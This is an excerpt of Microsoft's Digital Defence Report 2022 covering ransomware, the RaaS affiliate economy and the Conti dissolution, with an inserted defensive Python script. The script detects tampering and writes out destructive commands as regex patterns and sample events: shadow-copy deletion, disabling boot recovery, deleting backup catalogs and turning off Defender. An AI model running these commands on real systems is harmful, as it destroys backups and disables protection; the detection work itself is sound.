Microsoft
Digital Defence
Report 2022
Illuminating the threat landscape
and empowering a digital defence.
Contents
The data, insights and events in this report are from July 2021 through June 2022 (Microsoft fiscal year 2022), unless otherwise noted.
For the best experience viewing and navigating this report, we recommend using Adobe Reader, available as a free download from the Adobe website.
Report Introduction 02
The State of Cybercrime 06
  An overview of The State of Cybercrime 07
  Introduction 08
  Ransomware and extortion: A nation-level threat 09
  Ransomware insights from front-line responders 14
  Cybercrime-as-a-Service 18
  The evolving phishing threat landscape 21
  A timeline of botnet disruption from Microsoft’s early days of collaboration 25
  Cybercriminal abuse of infrastructure 26
  Is hacktivism here to stay? 28
Nation State Threats 30
  An overview of Nation State Threats 31
  Introduction 32
  Background on nation state data 33
  Sample of nation state actors and their activities 34
  The evolving threat landscape 35
  The IT supply chain as a gateway to the digital ecosystem 37
  Rapid vulnerability exploitation 39
  Russian state actors’ wartime cyber tactics threaten Ukraine and beyond 41
  China expanding global targeting for competitive advantage 44
  Iran growing increasingly aggressive following power transition 46
  North Korean cyber capabilities employed to achieve regime’s three main goals 49
  Cyber mercenaries threaten the stability of cyberspace 52
  Operationalising cybersecurity norms for peace and security in cyberspace 53
Devices and Infrastructure 56
  An overview of Devices and Infrastructure 57
  Introduction 58
  Governments acting to improve critical infrastructure security and resilience 59
  IoT and OT exposed: Trends and attacks 62
  Supply chain and firmware hacking 65
  Spotlight on firmware vulnerabilities 66
  Reconnaissance-based OT attacks 68
Cyber Influence Operations 71
  An overview of Cyber Influence Operations 72
  Introduction 73
  Trends in cyber influence operations 74
  Influence operations during the COVID-19 pandemic and Russia’s invasion of Ukraine 76
  Tracking the Russian Propaganda Index 78
  Synthetic media 80
  A holistic approach to protect against cyber influence operations 83
Cyber Resilience 86
  An overview of Cyber Resilience 87
  Introduction 88
  Cyber resiliency: A crucial foundation of a connected society 89
  The importance of modernising systems and architecture 90
  Basic security posture is a determining factor in advanced solution effectiveness 92
  Maintaining identity health is fundamental to organisational well-being 93
  Operating system default security settings 96
  Software supply chain centrality 97
  Building resilience to emerging DDoS, web application and network attacks 98
  Developing a balanced approach to data security and cyber resiliency 101
  Resilience to cyber influence operations: The human dimension 102
  Fortifying the human factor with skilling 103
  Insights from our ransomware elimination program 104
  Act now on quantum security implications 105
  Integrating business, security and IT for greater resilience 106
  The cyber resilience bell curve 108
Contributing Teams 110
01 Microsoft Digital Defence Report 2022
Introduction by Tom Burt
Corporate Vice President, Customer Security & Trust

On February 23, 2022, the cybersecurity world entered a new age, the age of the hybrid war. On that day, hours before missiles were launched and tanks rolled across borders, Russian actors launched a massive destructive cyberattack against Ukrainian government, technology and financial sector targets. You can read more about these attacks and the lessons to be learned from them in the Nation State Threats chapter of this third annual edition of the Microsoft Digital Defence Report (MDDR). Key among those lessons is that the cloud provides the best physical and logical security against cyberattacks and enables advances in threat intelligence and endpoint protection that have proven their value in Ukraine.

While any survey of the year’s developments in cybersecurity must begin there, this year’s report provides a deep dive into much more. In the report’s first chapter, we focus on activities of cybercriminals, followed by nation state threats in chapter two. Both groups have greatly increased the sophistication of their attacks, which has dramatically increased the impact of their actions. While Russia drove headlines, Iranian actors escalated their attacks following a transition of presidential power, launching destructive attacks targeting Israel and ransomware and hack-and-leak operations targeting critical infrastructure in the United States. China also increased its espionage efforts in Southeast Asia and elsewhere in the global south, seeking to counter US influence and steal critical data and information.

Foreign actors are also using highly effective techniques to enable propaganda influence operations in regions around the globe, as covered in the third chapter. For example, Russia has worked hard to convince its citizens, and the citizens of many other countries, that its invasion of Ukraine was justified – while also sowing propaganda discrediting COVID vaccines in the West and simultaneously promoting their effectiveness at home. In addition, actors are increasingly targeting Internet of Things (IoT) devices or Operational Technology (OT) control devices as entry points to networks and critical infrastructure, which is discussed in chapter four. Finally, in the last chapter, we provide the insights and lessons we have learned over the past year defending against attacks directed at Microsoft and our customers as we review the year’s developments in cyber resilience.

Each chapter provides the key lessons learned and insights based on Microsoft’s unique vantage point. The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe. Microsoft is taking action to defend our customers and the digital ecosystem against these threats, and you can read about our technology that identifies and blocks billions of phishing attempts, identity thefts and other threats to our customers.

“The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe”

A snapshot of our landscape…
Scope and scale of threat landscape: The volume of password attacks has risen to an estimated 921 attacks every second – a 74% increase in just one year.
Dismantling cybercrime: To date, Microsoft removed more than 10,000 domains used by cybercriminals and 600 used by nation state actors.
Addressing vulnerabilities: 93% of our ransomware incident response engagements revealed insufficient controls on privilege access and lateral movement.
Introduction by Tom Burt (continued)

We also use legal and technical means to seize and shut down infrastructure used by cybercriminals and nation state actors, and notify customers when they are being threatened or attacked by a nation state actor. We work to develop increasingly effective features and services that use AI/ML technology to identify and block cyber threats and help security professionals defend against and identify cyber-intrusions more rapidly and effectively. Perhaps most importantly, throughout the MDDR we offer our best advice on the steps individuals, organisations and enterprises can take to defend against these increasing digital threats. Adopting good cyber hygiene practices is the best defence and can significantly reduce the risk of cyberattacks.

‘The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict.’

The state of cybercrime
Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency.
Find out more on p6

Nation state threats
Nation state actors are launching increasingly sophisticated cyberattacks designed to evade detection and further their strategic priorities. The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict. Russia has also supported its war with information influence operations, using propaganda to impact opinions in Russia, Ukraine and globally. Outside Ukraine, nation state actors have increased activity and have begun using advancements in automation, cloud infrastructure and remote access technologies to attack a wider set of targets. Corporate IT supply chains that enable access to ultimate targets were frequently attacked. Cybersecurity hygiene became even more critical as actors rapidly exploited unpatched vulnerabilities, used both sophisticated and brute force techniques to steal credentials and obfuscated their operations by using open-source or legitimate software. In addition, Iran joins Russia in the use of destructive cyberweapons, including ransomware, as a staple of their attacks. These developments require urgent adoption of a consistent, global framework that prioritises human rights and protects people from reckless state behaviour online. All nations must work together to implement norms and rules for responsible state conduct.
Find out more on p30

Devices and infrastructure
The pandemic, coupled with rapid adoption of internet-facing devices of all kinds as a component of accelerating digital transformation, has greatly increased the attack surface of our digital world. As a result, cybercriminals and nation states are quickly taking advantage. While the security of IT hardware and software has strengthened in recent years, the security of IoT and OT devices has not kept pace. Threat actors are exploiting these devices to establish access on networks and enable lateral movement, to establish a foothold in a supply chain or to disrupt the target organisation’s OT operations.
Find out more on p56
Introduction by Tom Burt (continued)

Cyber influence operations
Nation states are increasingly using sophisticated influence operations to distribute propaganda and impact public opinion both domestically and internationally. These campaigns erode trust, increase polarisation and threaten democratic processes. Skilled Advanced Persistent Manipulator actors are using traditional media together with internet and social media to vastly increase the scope, scale and efficiency of their campaigns, and the outsized impact they are having in the global information ecosystem. In the past year, we have seen these operations used as part of Russia’s hybrid war in Ukraine, but have also seen Russia and other nations, including China and Iran, increasingly deploy propaganda operations powered by social media to extend their global influence on a range of issues.
Find out more on p71

Cyber resilience
Security is a key enabler of technological success. Innovation and enhanced productivity can only be achieved by introducing security measures that make organisations as resilient as possible against modern attacks. The pandemic has challenged us at Microsoft to pivot our security practices and technologies to protect our employees wherever they work. This past year, threat actors continued to take advantage of vulnerabilities exposed during the pandemic and the shift to a hybrid work environment. Since then, our principal challenge has been managing the prevalence and complexity of various attack methods and increased nation state activity. In this chapter, we detail the challenges we have faced, and the defences we have mobilised in response with our more than 15,000 partners.
Find out more on p86

Our unique vantage point (July 1, 2021 through June 30, 2022)
43 tn signals synthesised daily, using sophisticated data analytics and AI algorithms to understand and protect against digital threats and criminal cyberactivity.
34.7 bn identity threats blocked.
37 bn email threats blocked.
2.5 bn endpoint signals analysed daily.
8,500+ engineers, researchers, data scientists, cybersecurity experts, threat hunters, geopolitical analysts, investigators and frontline responders across 77 countries.
15,000+ partners in our security ecosystem who increase cyber resilience for our customers.
Introduction by Tom Burt (continued)

We believe Microsoft – independently and through close partnerships with others in private industry, government and civil society – has a responsibility to protect the digital systems that underpin the social fabric of our society and promote safe, secure computing environments for every person, wherever they are located. This responsibility is the reason we have published the MDDR each year since 2020. The report is the culmination of Microsoft’s vast data and comprehensive research. It shares our unique insights on how the digital threat landscape is evolving and the crucial actions that can be taken today to improve the security of the ecosystem.

Our objective with this report is twofold:
1. To illuminate the evolving digital threat landscape for our customers, partners and stakeholders spanning the broader ecosystem, shining a light on both new cyberattacks and evolving trends in historically persistent threats.
2. To empower our customers and partners to improve their cyber resiliency and respond to these threats.

We hope to instil a sense of urgency, so readers take immediate action based on the data and insights we present both here and in our many cybersecurity publications throughout the year. As we consider the gravity of the threat to the digital landscape – and its translation into the physical world – it is important to remember that we are all empowered to take action to protect ourselves, our organisations and enterprises against digital threats.

Thank you for taking the time to review this year’s Microsoft Digital Defence Report. We hope you will find that it provides valuable insight and recommendations to help us collectively defend the digital ecosystem.

Tom Burt
Corporate Vice President, Customer Security & Trust
The State of Cybercrime
As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques.
An overview of The State of Cybercrime 07
Introduction 08
Ransomware and extortion: A nation-level threat 09
Ransomware insights from front-line responders 14
Cybercrime-as-a-Service 18
The evolving phishing threat landscape 21
A timeline of botnet disruption from Microsoft’s early days of collaboration 25
Cybercriminal abuse of infrastructure 26
Is hacktivism here to stay? 28
An overview of The State of Cybercrime
As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques.

Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency.

• The threat of ransomware and extortion is becoming more audacious with attacks targeting governments, businesses and critical infrastructure. Find out more on p9
• Human operated ransomware is most prevalent, as one-third of targets are successfully compromised by criminals using these attacks and 5% of those are ransomed. Find out more on p9
• Attackers increasingly threaten to disclose sensitive data to encourage ransom payments. Find out more on p10
• Cybercrime continues to rise as the industrialisation of the cybercrime economy lowers the skill barrier to entry by providing greater access to tools and infrastructure. Find out more on p18
• Credential phishing schemes which indiscriminately target all inboxes are on the rise and business email compromise, including invoice fraud, poses a significant cybercrime risk for enterprises. Find out more on p21
• To disrupt the malicious infrastructures of cybercriminals and nation state actors, Microsoft relies on innovative legal approaches and our public and private partnerships. Find out more on p25
[Graphics on this page: ‘Understanding the ransomware economy’ (operators, affiliates and access brokers; see p11) and ‘Human operated ransomware targeting and rate of success model’ (see p15).]

The most effective defence against ransomware includes multifactor authentication, frequent security patches and Zero Trust principles across network architecture. Find out more on p13

[Chart: BEC themes (January–June 2022). Categories shown: gift card scam, invoice fraud, payroll redirection, business information; values shown: 9.3%, 4.6%, 4.3%, 1.9% (category-to-value pairing not preserved in the extracted text). Further chart labels: ‘Ransomware’, ‘Pre-ransomware’, ‘2022’.]
Introduction

As cyber defences improve and more governments and businesses take a proactive approach to prevention, we see attackers using two strategies to gain the access required to facilitate cybercrime. One approach is a campaign with broad targets that relies on volume. The other uses surveillance and more selective targeting to increase the rate of return. Even when revenue generation is not the objective – such as nation state activity for geopolitical purposes – both random and targeted attacks are used. This past year, cybercriminals continued to rely on social engineering and exploitation of topical issues to maximise the success of campaigns. For example, while COVID-themed phishing lures were used less frequently, we observed an increase in lures soliciting donations to support the citizens of Ukraine.

Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. We have observed cybercriminals becoming more frugal, and attackers are no longer paying for technology. To lower their overhead and boost the appearance of legitimacy, some attackers increasingly seek to compromise businesses to host phishing campaigns, malware or even use their computing power to mine cryptocurrency.

In this chapter, we also examine the rise in hacktivism, a disruption caused by private citizens conducting cyberattacks to further social or political goals. Thousands of individuals around the world, both experts and novices, have mobilised since February 2022 to launch attacks such as disabling websites and leaking stolen data as part of the Russia-Ukraine war. It is too soon to predict whether this trend will continue after the end of active hostilities.

Organisations must regularly review and strengthen access controls and implement security strategies to defend against cyberattacks. However, that is not all they can do. We explain how our Digital Crimes Unit (DCU) has used civil cases to seize malicious infrastructure used by cybercriminals and nation state actors. We must fight this threat together through both public and private partnerships. We hope that by sharing what we have learned over the past 10 years, we will help others understand and consider the proactive measures they can take to protect themselves and the wider ecosystem against the continually growing threat of cybercrime.

Amy Hogan-Burney
General Manager, Digital Crimes Unit

‘Cybercrime continues to rise, with increases in both random and targeted attacks.’
Ransomware and extortion: A nation-level threat

Ransomware attacks pose an increased danger to all individuals as critical infrastructure, businesses of all sizes and state and local governments are targeted by criminals leveraging a growing cybercriminal ecosystem.

Over the past two years, high profile ransomware incidents – such as those involving critical infrastructure, healthcare and IT service providers – have drawn considerable public attention. As ransomware attacks have become more audacious in scope, their effects have become more wide ranging. The following are examples of attacks we’ve seen already in 2022:
• In February, an attack on two companies affected the payment processing systems of hundreds of petrol stations in northern Germany.1
• In March, an attack against Greece’s postal service temporarily disrupted mail delivery and impacted the processing of financial transactions.2
• In late May, a ransomware attack against Costa Rican government agencies forced a national emergency to be declared after hospitals were shut down and customs and tax collection disrupted.3
• Also in May, an attack caused flight delays and cancellations for one of India’s largest airlines, leaving hundreds of passengers stranded.4

The success of these attacks and the extent of their real-world impacts are the result of an industrialisation of the cybercrime economy, enabling access to tooling and infrastructure and expanding cybercriminal capabilities by lowering their skill barrier to entry.

In recent years, ransomware has moved from a model where a single ‘gang’ would both develop and distribute a ransomware payload to the Ransomware-as-a-Service (RaaS) model. RaaS allows one group to manage the development of the ransomware payload and provide services for payment and extortion via data leakage to other cybercriminals – the ones who actually launch the ransomware attacks, referred to as ‘affiliates’ – for a cut of the profits. This franchising of the cybercrime economy has expanded the attacker pool. The industrialisation of cybercriminal tooling has made it easier for attackers to perform intrusions, exfiltrate data and deploy ransomware.

Human operated ransomware5 – a term coined by Microsoft researchers to describe threats driven by humans who make decisions at every stage of the attacks based on what they discover in their target’s network, and which delineates the threat from commodity ransomware attacks – remains a significant threat to organisations.

Human operated ransomware targeting and rate of success model (see p15)
Of 2,500 potential target organisations, 60 encounter activity associated with known ransomware attackers, 20 are successfully compromised and 1 falls victim to a successful ransomware event.
Factors: low barrier to entry; access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack; RaaS affiliates prioritise targets by intended impact or perceived profit; attackers take advantage of any security weakness they find in the network, so attacks vary; the ransomware payload is the culmination of a chain of malicious activity.
Model based on Microsoft Defender for Endpoint (EDR) data (January-June 2022).
Ransomware and extortion: A nation-level threat (continued)

Expanding relationships between specialised cybercriminals have increased the pace, sophistication and success of ransomware attacks. This has driven the evolution of the cybercriminal ecosystem into connected players with different techniques, goals and skillsets that support each other on initial access to targets, payment services and decryption or publication tools or sites.

Ransomware operators can now purchase access to organisations or government networks online or obtain credentials and access via interpersonal relationships with brokers whose main objective is solely to monetise the access they have gained. The operators then use the purchased access to deploy a ransomware payload bought via dark web marketplaces or forums. In many cases, negotiations with victims are conducted by the RaaS team, not the operators themselves. These criminal transactions are seamless and the participants risk little chance of being arrested and charged due to the anonymity of the dark web and the difficulty of enforcing laws transnationally. A sustainable and successful effort against this threat will require a whole-of-government strategy to be executed in close partnership with the private sector.

Ransomware attacks have become even more impactful as the adoption of a double extortion monetisation strategy has become a standard practice. This involves exfiltrating data from compromised devices, encrypting the data on the devices and then posting or threatening to post the stolen data publicly to pressure victims into paying a ransom.

‘Digital threat activity is at an all-time high and the level of sophistication increases every day.’

Although most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, some purchase access from other cybercriminals, leveraging connections between access brokers and ransomware operators.

Our unique breadth of signal intelligence is gathered from multiple sources – identity, email, endpoints and cloud – and provides insight into the growing ransomware economy, complete with an affiliate system which includes tools designed for less technically-abled attackers.
Contrary to how ransomware is sometimes
portrayed in the media, it is rare for a single
ransomware variant to be managed by one
end-to-end ‘ransomware gang’. Instead, there
are separate entities that build malware, gain
access to victims, deploy ransomware and handle
extortion negotiations. The industrialisation of
the criminal ecosystem has led to:
• Access brokers that break in and hand off
access (Access-as-a-Service).
• Malware developers that sell tooling.
• Criminal operators and affiliates that
conduct intrusions.
• Encryption and extortion service
providers that take over monetisation
from affiliates (RaaS).
All human-operated ransomware campaigns
share common dependencies on security
weaknesses. Specifically, attackers usually
take advantage of an organisation’s poor
cyber hygiene, which often includes infrequent
patching and failure to implement multifactor
authentication (MFA).
A RaaS program (or syndicate) is an arrangement between
an operator and an affiliate. The RaaS operator develops and
maintains the tools to power the ransomware operations,
including the builders that produce the ransomware
payloads and payment portals for communicating with
victims. Many RaaS programs incorporate a suite of
extortion support offerings, including leak site hosting
and integration into ransom notes, as well as decryption
negotiation, payment pressure and cryptocurrency
transaction services.
Affiliates are generally small groups of people ‘affiliated’
with one or more RaaS programs. Their role is to deploy the
RaaS program payloads. Affiliates move laterally in the
network, persist on systems and exfiltrate data. Each affiliate
has unique characteristics, such as different ways of doing
data exfiltration.
Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force or vulnerability exploitation. Access broker entities can range from large to small. Top-tier access brokers specialise in high-value network access, while lower-tier brokers on the dark web might have just one or two usable stolen credentials for sale.
Organisations and individuals with weak cybersecurity
hygiene practices are at greater risk of having their network
credentials stolen.
Figure: Understanding the ransomware economy. Roles shown: operators, affiliates and access brokers. RaaS programs named in the figure: Conti, HIVE, BlackMatter, LockBit, REvil, BlackCat.
Case study: The dissolution of Conti
Conti, one of the top ransomware variants
over the past two years, began shutting down
operations in mid-2022, with the Microsoft
Threat Intelligence Centre (MSTIC) observing
a significant decrease in activity in late March
and early April. We observed the last Conti
ransomware deployments in mid-April.
However, much like the shuttering of other
ransomware operations, Conti’s dissolution did
not have a significant impact on ransomware
deployments, as MSTIC observed Conti affiliates
pivoting to deploy other ransomware payloads,
including BlackBasta, Lockbit 2.0, LockbitBlack
and HIVE. This is consistent with data from
previous years and suggests that when
ransomware gangs go offline, they re-emerge
months later or redistribute their technical
capabilities and resources to new groups.
Our Microsoft threat intelligence teams track
ransomware threat actors as individual groups
(labelled as DEVs) based on their specific tools,
rather than tracking them by the malware they
use. This meant that when Conti’s affiliates
dispersed, we were able to continue tracking
these DEVs through their use of other tools or
RaaS kits. For example:
• DEV-0230, which is affiliated with Trickbot,
had been a prolific user of Conti. In late April,
MSTIC observed it using QuantumLocker.
• DEV-0237 shifted from Conti’s ransomware
kit to HIVE and Nokoyawa, including using
HIVE in the May 31 attack against Costa
Rican government agencies.
• DEV-0506, another prolific user of the
Conti ransomware kit, was observed
using BlackBasta.
Figure: Example of an affiliate (DEV-0237) quickly shifting between RaaS programs. After a RaaS program such as Conti is shut down, the ransomware affiliate shifts to another one (Hive) almost immediately. Timeline, January 2021 to June 2022:
• Ryuk: 2020 to June 2021
• Conti: July to October 2021
• Hive: October 2021 to present
• BlackCat: March 2022 to present
• Nokoyawa: May 2022 to present
• Agenda etc.: June 2022 (experimenting)
RaaS evolves the ransomware ecosystem
and hinders attribution
Because human-operated ransomware is driven
by individual operators, attack patterns vary
based on the target and alternate throughout the
duration of an attack. In the past, we observed
a close relationship between the initial entry
vector, tools and ransomware payload choices
in each campaign of a single ransomware strain.
This made attribution easier. The RaaS affiliate
model, however, decouples this relationship.
As a result, Microsoft tracks ransomware
affiliates deploying payloads in specific attacks,
rather than tracking the ransomware payload
developers as operators.
Put another way, we no longer assume the
HIVE developer is the operator behind a HIVE
ransomware attack; it is more likely to be
an affiliate.
The cybersecurity industry has struggled to
adequately capture this delineation between
developers and operators. The industry still often
reports a ransomware incident by its payload
name, giving the false impression that a single
entity, or ransomware gang, is behind all attacks
using that particular ransomware payload, and
all incidents associated with it share common
techniques and infrastructure. To support
network defenders, it is important to learn more
about the stages that precede different affiliates’
attacks – such as data exfiltration and additional
persistence mechanisms – and the detection and
protection opportunities that might exist.
More so than malware, attackers
need credentials to succeed in their
operations. The successful human
operated ransomware infection of
an entire organisation relies on access
to a highly privileged account.
Spotlight on human-operated
ransomware attacks
Over the past year, Microsoft’s
ransomware experts conducted deep
investigations into more than 100 human-
operated ransomware incidents to track
attackers’ techniques and understand
how to better protect our customers.
It is important to note that the analysis we share here is possible only for onboarded, managed devices. Non-onboarded, unmanaged devices represent the least secure part of an organisation's hardware assets.
A durable security strategy
Combating and preventing attacks of this nature
requires a shift in an organisation’s mindset to
focus on the comprehensive protection required
to slow and stop attackers before they can
move from the pre-ransomware phase to the
ransomware deployment phase.
Enterprises must apply security best practices
consistently and aggressively to their networks,
with the goal of mitigating classes of attacks.
Because of the human decision making involved, these ransomware attacks can generate multiple, seemingly disparate security product alerts which can easily get lost or not be responded to in time. Alert fatigue is real, and security operations centres (SOCs) can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can not only reduce alert volume, but also stop many attackers before they get access to networks.
Organisations must maintain
continuous high standards of
security posture and network
hygiene to protect themselves
from human-operated
ransomware attacks.
The typical human-operated attack
Human-operated ransomware attacks can be categorised into the pre-ransomware phase and the ransomware deployment phase. During the pre-ransomware phase, attackers prepare to infiltrate the network by learning about the organisation's topology and security infrastructure.
Figure: The two phases of a human-operated ransomware attack.
• Pre-ransomware phase: attackers prepare to infiltrate the network by learning as much as possible about the topology and security infrastructure. Attackers may also exfiltrate data in this phase. This phase can range from a few days to several weeks or months, although it has been shortening over the past two years.
• Ransomware deployment phase: attackers aim to encrypt as much data as possible. This phase can last only minutes.
Stop the attackers before they reach the ransomware deployment phase.
Our investigations found most actors behind human-operated ransomware attacks take advantage of similar security weaknesses and share common attack patterns and techniques.
Most prevalent ransomware-phase techniques:
• 75% use admin tools.
• 75% use an acquired, elevated, compromised user account to spread malicious payloads through the SMB protocol.
• 99% attempt to tamper with discovered security and backup products using OS-built tools.
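The two most distinctive techniques above, tampering with recovery and protection using OS-built tools and spreading over SMB with one elevated account, both leave a footprint in ordinary Windows Security events. The following is an added example written for this page, not code from the report and not a Microsoft Defender rule: it scans constructed event records, 4688 process-creation events for command lines that delete shadow copies, disable boot recovery or stop security and backup services, and 5140 share-access events for one account touching administrative shares on many hosts, and reports the accounts that show both behaviours. The record shape, field names, thresholds and the set of command-line patterns are simplifying assumptions rather than a complete rule set.

```python
"""Added example: flag ransomware-phase tampering and SMB lateral movement in
simplified Windows Security event records. Not code from the report."""
import re
from collections import defaultdict

# Command-line patterns for OS-built tools commonly abused to disable recovery
# and protection (illustrative subset, not a complete detection rule set).
TAMPER_PATTERNS = {
    "shadow_copy_delete": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "boot_recovery_disabled": re.compile(
        r"bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I),
    "backup_catalog_delete": re.compile(
        r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I),
    "defender_realtime_disabled": re.compile(
        r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I),
    "protection_service_stopped": re.compile(
        r"\b(net1?|sc)(\.exe)?\s+stop\s+\"?(windefend|sense|veeam\w*|\w*backup\w*)", re.I),
}

# Administrative shares: \\*\ADMIN$, \\*\C$ and other drive-letter shares.
ADMIN_SHARE = re.compile(r"\\(ADMIN|[A-Z])\$$", re.I)

# Constructed sample events. Field names loosely mirror Security log 4688
# (process creation) and 5140 (network share object accessed); assumed shape.
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "FS01", "user": "CORP\\svc_backup",
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"event_id": 4688, "host": "FS01", "user": "CORP\\svc_backup",
     "command_line": "bcdedit /set {default} recoveryenabled No"},
    {"event_id": 4688, "host": "FS01", "user": "CORP\\svc_backup",
     "command_line": "wbadmin delete catalog -quiet"},
    {"event_id": 4688, "host": "FS01", "user": "CORP\\svc_backup",
     "command_line": "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"event_id": 4688, "host": "FS01", "user": "CORP\\svc_backup",
     "command_line": "net stop VeeamBackupSvc"},
    {"event_id": 4688, "host": "WS07", "user": "CORP\\jdoe",
     "command_line": "C:\\Windows\\system32\\notepad.exe report.txt"},
    {"event_id": 5140, "host": "WS01", "user": "CORP\\svc_backup",
     "source_ip": "10.0.0.15", "share_name": "\\\\*\\ADMIN$"},
    {"event_id": 5140, "host": "WS02", "user": "CORP\\svc_backup",
     "source_ip": "10.0.0.15", "share_name": "\\\\*\\ADMIN$"},
    {"event_id": 5140, "host": "WS03", "user": "CORP\\svc_backup",
     "source_ip": "10.0.0.15", "share_name": "\\\\*\\C$"},
    {"event_id": 5140, "host": "WS04", "user": "CORP\\svc_backup",
     "source_ip": "10.0.0.15", "share_name": "\\\\*\\ADMIN$"},
    {"event_id": 5140, "host": "FS02", "user": "CORP\\jdoe",
     "source_ip": "10.0.0.77", "share_name": "\\\\*\\Finance"},
]


def detect_tampering(events):
    """One finding per 4688 event whose command line matches a tampering pattern."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4688:
            continue
        cmd = ev.get("command_line", "")
        for technique, pattern in TAMPER_PATTERNS.items():
            if pattern.search(cmd):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "technique": technique, "command_line": cmd})
                break  # report the first matching technique per event
    return findings


def detect_smb_spread(events, min_hosts=3):
    """Accounts that accessed administrative shares on at least min_hosts distinct hosts."""
    hosts_by_user = defaultdict(set)
    for ev in events:
        if ev.get("event_id") == 5140 and ADMIN_SHARE.search(ev.get("share_name", "")):
            hosts_by_user[ev["user"]].add(ev["host"])
    return {user: sorted(hosts) for user, hosts in hosts_by_user.items()
            if len(hosts) >= min_hosts}


def triage(events, min_hosts=3):
    """Accounts that both tampered with recovery/protection and spread over SMB:
    the ones to disable and investigate first."""
    tampering_users = {f["user"] for f in detect_tampering(events)}
    spread = detect_smb_spread(events, min_hosts)
    return sorted(tampering_users & set(spread))


if __name__ == "__main__":
    for f in detect_tampering(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['user']} on {f['host']}: {f['command_line']}")
    print("SMB spread:", detect_smb_spread(SAMPLE_EVENTS))
    print("Accounts to contain first:", triage(SAMPLE_EVENTS))
```

In production the same logic would run over a SIEM query rather than a list literal, and the 5140 correlation should be bounded by a time window; the point of the example is that a single elevated account touching recovery settings and many ADMIN$ shares is the signal the report's statistics describe, and it is visible in telemetry that most environments already collect.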
Actionable insights
Ransomware attackers are motivated by
easy profits, so adding to their cost via
security hardening is key in disrupting the
cybercriminal economy.
1 Build credential hygiene. More so than
malware, attackers need credentials to
succeed in their operations. The successful
human-operated ransomware infection of
an entire organisation relies on access to
a highly privileged account like a Domain
Administrator, or abilities to edit
a Group Policy.
2 Audit credential exposure.
3 Prioritise deployment of Active
Directory updates.
4 Prioritise cloud hardening.
5 Reduce the attack surface.
6 Harden internet-facing assets and
understand your perimeter.
7 Reduce SOC alert fatigue by hardening
your network to reduce volume and
preserve bandwidth for high priority
incidents.
Links to further information
RaaS: Understanding the cybercrime gig
economy and how to protect yourself |
Microsoft Security Blog
Human-operated ransomware attacks:
A preventable disaster | Microsoft
Security Blog
Ransomware insights
from front-line
responders
Organisations worldwide experienced
a steady growth in human-operated
ransomware attacks beginning in 2019.
However, law enforcement operations
and geopolitical events in the last
year had a significant impact on
cybercriminal organisations.
Microsoft’s Security Service Line supports
customers through an entire cyberattack, from
investigation to successful containment and
recovery activities. The response and recovery
services are offered via two highly integrated
teams, with one focusing on the investigation and
groundwork for recovery and the second one on
containment and recovery. This section presents
a summary of findings based on ransomware
engagements over the past year.
Ransomware incident and recovery engagements by industry:
• Manufacturing 28%
• Health 20%
• Consumer retail 16%
• Finance 8%
• Government 8%
• Energy 8%
• Education 8%
• IT 4%
As new small groups and threats emerge,
defending teams must be aware of evolving
ransomware threats while protecting against
previously unknown ransomware malware
families. The rapid development approach
used by criminal groups led to the creation of
intelligent ransomware packaged in easy-to-use
kits. This allows greater flexibility in launching
widespread attacks on a higher number
of targets.
The following pages provide a deeper look at the
most commonly observed contributing factors to
weak protection against ransomware, grouped
into three categories of findings:
1. Weak identity controls
2. Ineffective security operations
3. Limited data protection
93%
of Microsoft investigations
during ransomware recovery
engagements revealed
insufficient privilege access
and lateral movement controls.
Summary of most common findings in ransomware response engagements (share of engagements in which the finding was observed):
• Insufficient privilege access and lateral movement controls: 93%
• Limited adoption of modern security frameworks: 87%
• Insecure configuration of identity provider: 86%
• Insufficient application security practices: 74%
• No multifactor authentication: 74%
• Lack of information protection control: 65%
• Low maturity security operations: 62%
The most common finding among ransomware incident response engagements was insufficient privilege access and lateral movement controls.
The three main contributing factors seen in our on-site response engagements:
1 Weak identity controls: credential theft attacks remain one of the top contributing factors.
2 Ineffective security operations processes do not just present a window of opportunity for attackers, but significantly impact the time to recover.
3 Eventually it boils down to data: organisations struggle to implement an effective data protection strategy which aligns with their business needs.
1 Weak identity controls
Human-operated ransomware continues to evolve and employ credential theft and lateral movement methods traditionally associated with targeted attacks. Successful attacks are often the result of long-running campaigns involving compromise of identity systems, like Active Directory (AD), that allow human operators to steal credentials, access systems and remain persistent in the network.
Active Directory (AD) and Azure AD security
88% of impacted customers did not employ AD and Azure AD security best practices. This has become a common attack vector as attackers exploit misconfigurations and weaker security postures in critical identity systems to gain broader access and impact on businesses.
Least privilege access and use of Privileged Access Workstations (PAW)
